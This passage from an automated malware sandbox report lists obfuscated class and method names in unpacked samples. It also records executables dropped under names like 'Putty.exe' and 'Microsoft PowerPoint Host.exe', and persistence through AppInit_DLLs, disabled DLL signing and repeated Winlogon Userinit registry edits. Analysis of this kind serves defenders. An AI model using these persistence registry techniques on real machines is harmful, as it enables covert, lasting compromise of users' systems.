Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: xdwdPutty.exe.33.dr, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdPutty.exe.33.dr, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdPutty.exe.33.dr, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: xdwdPutty.exe.33.dr, xeRJPXmwavvZh.cs	High entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdPutty.exe.33.dr, rZjCSSmKXaUqXO.cs	High entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdPutty.exe.33.dr, KaCEkWzArz.cs	High entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdPutty.exe.33.dr, vzOQfCjdwrwlD.cs	High entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdPutty.exe.33.dr, wgtJFxwmDCkn.cs	High entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdPutty.exe.33.dr, WfcSxBiJWHQqTp.cs	High entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdPutty.exe.33.dr, LtuDkZEKFIyjL.cs	High entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdPutty.exe.33.dr, uBecUVPQ.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdPutty.exe.33.dr, rTbUtmWcnO.cs	High entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdPutty.exe.33.dr, kICtJPxSafoGvi.cs	High entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdPutty.exe.33.dr, bNrRgbuKfhLKh.cs	High entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	High entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'

Drops PE files

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	File created: C:\Users\user\Videos\xdwdPutty.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	File created: C:\Users\user\xdwdPutty.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	File created: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to dropped file

Boot Survival

Allows loading of unsigned dll using appinit_dll

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Registry value created: RequireSignedAppInit_DLLs 0

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
